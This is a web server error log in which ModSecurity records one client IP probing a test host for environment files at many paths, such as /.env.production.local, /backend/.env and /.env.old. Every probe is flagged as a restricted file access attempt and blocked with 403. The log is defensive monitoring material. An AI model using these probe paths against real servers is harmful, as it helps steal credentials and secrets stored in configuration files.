[Fri Dec 19 21:14:00.836738 2025] [:error] [pid 839889] [client 45.148.10.159:44008] [client 45.148.10.159] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/development/.env"] [unique_id "aUWyCOQyAZTrDtMMzDspVgAAAAg"]
[Fri Dec 19 21:14:00.836936 2025] [:error] [pid 839889] [client 45.148.10.159:44008] [client 45.148.10.159] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/development/.env"] [unique_id "aUWyCOQyAZTrDtMMzDspVgAAAAg"]
[Fri Dec 19 21:14:00.931620 2025] [:error] [pid 839889] [client 45.148.10.159:44008] [client 45.148.10.159] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aUWyCOQyAZTrDtMMzDspVwAAAAg"]
[Fri Dec 19 21:14:00.931837 2025] [:error] [pid 839889] [client 45.148.10.159:44008] [client 45.148.10.159] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aUWyCOQyAZTrDtMMzDspVwAAAAg"]
[Fri Dec 19 21:14:00.932015 2025] [:error] [pid 839889] [client 45.148.10.159:44008] [client 45.148.10.159] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aUWyCOQyAZTrDtMMzDspVwAAAAg"]
[Fri Dec 19 21:14:01.345041 2025] [:error] [pid 839892] [client 45.148.10.159:44020] [client 45.148.10.159] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/shared/config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/api/shared/config/.env"] [unique_id "aUWyCX5m84_EwtKPef0u_AAAAAs"]
[Fri Dec 19 21:14:01.345285 2025] [:error] [pid 839892] [client 45.148.10.159:44020] [client 45.148.10.159] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/api/shared/config/.env"] [unique_id "aUWyCX5m84_EwtKPef0u_AAAAAs"]
[Fri Dec 19 21:14:01.345440 2025] [:error] [pid 839892] [client 45.148.10.159:44020] [client 45.148.10.159] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/api/shared/config/.env"] [unique_id "aUWyCX5m84_EwtKPef0u_AAAAAs"]
[Fri Dec 19 21:14:02.087599 2025] [:error] [pid 834990] [client 45.148.10.159:44028] [client 45.148.10.159] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/shared/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/api/shared/.env"] [unique_id "aUWyCvFo6pMcMVt_qrtFwAAAAAA"]
[Fri Dec 19 21:14:02.087830 2025] [:error] [pid 834990] [client 45.148.10.159:44028] [client 45.148.10.159] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/api/shared/.env"] [unique_id "aUWyCvFo6pMcMVt_qrtFwAAAAAA"]
[Fri Dec 19 21:14:02.088042 2025] [:error] [pid 834990] [client 45.148.10.159:44028] [client 45.148.10.159] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/api/shared/.env"] [unique_id "aUWyCvFo6pMcMVt_qrtFwAAAAAA"]
[Fri Dec 19 21:14:05.315707 2025] [:error] [pid 839890] [client 45.148.10.159:44040] [client 45.148.10.159] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /node/.env_example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/node/.env_example"] [unique_id "aUWyDYQStO_v-3hKEQTFFAAAAAk"]
[Fri Dec 19 21:14:05.315947 2025] [:error] [pid 839890] [client 45.148.10.159:44040] [client 45.148.10.159] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/node/.env_example"] [unique_id "aUWyDYQStO_v-3hKEQTFFAAAAAk"]
[Fri Dec 19 21:14:05.316117 2025] [:error] [pid 839890] [client 45.148.10.159:44040] [client 45.148.10.159] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/node/.env_example"] [unique_id "aUWyDYQStO_v-3hKEQTFFAAAAAk"]
[Fri Dec 19 21:14:05.684494 2025] [:error] [pid 839893] [client 45.148.10.159:44042] [client 45.148.10.159] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.production.local"] [unique_id "aUWyDZyFITheFL9PQVsTbwAAAAw"]
[Fri Dec 19 21:14:05.684726 2025] [:error] [pid 839893] [client 45.148.10.159:44042] [client 45.148.10.159] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.production.local"] [unique_id "aUWyDZyFITheFL9PQVsTbwAAAAw"]
[Fri Dec 19 21:14:05.684890 2025] [:error] [pid 839893] [client 45.148.10.159:44042] [client 45.148.10.159] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.production.local"] [unique_id "aUWyDZyFITheFL9PQVsTbwAAAAw"]
[Fri Dec 19 21:14:05.746254 2025] [:error] [pid 839893] [client 45.148.10.159:44042] [client 45.148.10.159] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aUWyDZyFITheFL9PQVsTcAAAAAw"]
[Fri Dec 19 21:14:05.746500 2025] [:error] [pid 839893] [client 45.148.10.159:44042] [client 45.148.10.159] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aUWyDZyFITheFL9PQVsTcAAAAAw"]
[Fri Dec 19 21:14:05.746659 2025] [:error] [pid 839893] [client 45.148.10.159:44042] [client 45.148.10.159] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aUWyDZyFITheFL9PQVsTcAAAAAw"]
[Fri Dec 19 21:14:05.839129 2025] [:error] [pid 839893] [client 45.148.10.159:44042] [client 45.148.10.159] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aUWyDZyFITheFL9PQVsTcQAAAAw"]
[Fri Dec 19 21:14:05.839359 2025] [:error] [pid 839893] [client 45.148.10.159:44042] [client 45.148.10.159] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aUWyDZyFITheFL9PQVsTcQAAAAw"]
[Fri Dec 19 21:14:05.839541 2025] [:error] [pid 839893] [client 45.148.10.159:44042] [client 45.148.10.159] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aUWyDZyFITheFL9PQVsTcQAAAAw"]
[Fri Dec 19 21:14:05.889662 2025] [:error] [pid 839893] [client 45.148.10.159:44042] [client 45.148.10.159] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.stage"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.stage"] [unique_id "aUWyDZyFITheFL9PQVsTcgAAAAw"]
[Fri Dec 19 21:14:05.889898 2025] [:error] [pid 839893] [client 45.148.10.159:44042] [client 45.148.10.159] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.stage"] [unique_id "aUWyDZyFITheFL9PQVsTcgAAAAw"]
[Fri Dec 19 21:14:05.890128 2025] [:error] [pid 839893] [client 45.148.10.159:44042] [client 45.148.10.159] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.stage"] [unique_id "aUWyDZyFITheFL9PQVsTcgAAAAw"]
[Fri Dec 19 21:14:06.229300 2025] [:error] [pid 842793] [client 45.148.10.159:44048] [client 45.148.10.159] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aUWyDt0gNgrzumDf_nEYJQAAAA8"]
[Fri Dec 19 21:14:06.229425 2025] [:error] [pid 842793] [client 45.148.10.159:44048] [client 45.148.10.159] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aUWyDt0gNgrzumDf_nEYJQAAAA8"]
[Fri Dec 19 21:14:06.229635 2025] [:error] [pid 842793] [client 45.148.10.159:44048] [client 45.148.10.159] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aUWyDt0gNgrzumDf_nEYJQAAAA8"]
[Fri Dec 19 21:14:06.229798 2025] [:error] [pid 842793] [client 45.148.10.159:44048] [client 45.148.10.159] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aUWyDt0gNgrzumDf_nEYJQAAAA8"]
[Fri Dec 19 21:14:06.649182 2025] [:error] [pid 850607] [client 45.148.10.159:44054] [client 45.148.10.159] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env_sample"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env_sample"] [unique_id "aUWyDnPx2lx5B6vbh26PVwAAAAE"]
[Fri Dec 19 21:14:06.650186 2025] [:error] [pid 850607] [client 45.148.10.159:44054] [client 45.148.10.159] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env_sample"] [unique_id "aUWyDnPx2lx5B6vbh26PVwAAAAE"]
[Fri Dec 19 21:14:06.650398 2025] [:error] [pid 850607] [client 45.148.10.159:44054] [client 45.148.10.159] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env_sample"] [unique_id "aUWyDnPx2lx5B6vbh26PVwAAAAE"]
[Fri Dec 19 21:14:07.662519 2025] [:error] [pid 850609] [client 45.148.10.159:44072] [client 45.148.10.159] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.prod"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aUWyD8MHI_7HAr6pD1actAAAAAU"]
[Fri Dec 19 21:14:07.662746 2025] [:error] [pid 850609] [client 45.148.10.159:44072] [client 45.148.10.159] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aUWyD8MHI_7HAr6pD1actAAAAAU"]
[Fri Dec 19 21:14:07.662901 2025] [:error] [pid 850609] [client 45.148.10.159:44072] [client 45.148.10.159] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aUWyD8MHI_7HAr6pD1actAAAAAU"]
[Fri Dec 19 21:14:11.500267 2025] [:error] [pid 850619] [client 45.148.10.159:52832] [client 45.148.10.159] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /crm/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/crm/.env"] [unique_id "aUWyE1b5He19s00C5dcBhAAAAAQ"]
[Fri Dec 19 21:14:11.500555 2025] [:error] [pid 850619] [client 45.148.10.159:52832] [client 45.148.10.159] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/crm/.env"] [unique_id "aUWyE1b5He19s00C5dcBhAAAAAQ"]
[Fri Dec 19 21:14:11.500754 2025] [:error] [pid 850619] [client 45.148.10.159:52832] [client 45.148.10.159] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/crm/.env"] [unique_id "aUWyE1b5He19s00C5dcBhAAAAAQ"]
[Fri Dec 19 21:14:11.592823 2025] [:error] [pid 850619] [client 45.148.10.159:52832] [client 45.148.10.159] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /local/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/local/.env"] [unique_id "aUWyE1b5He19s00C5dcBhQAAAAQ"]
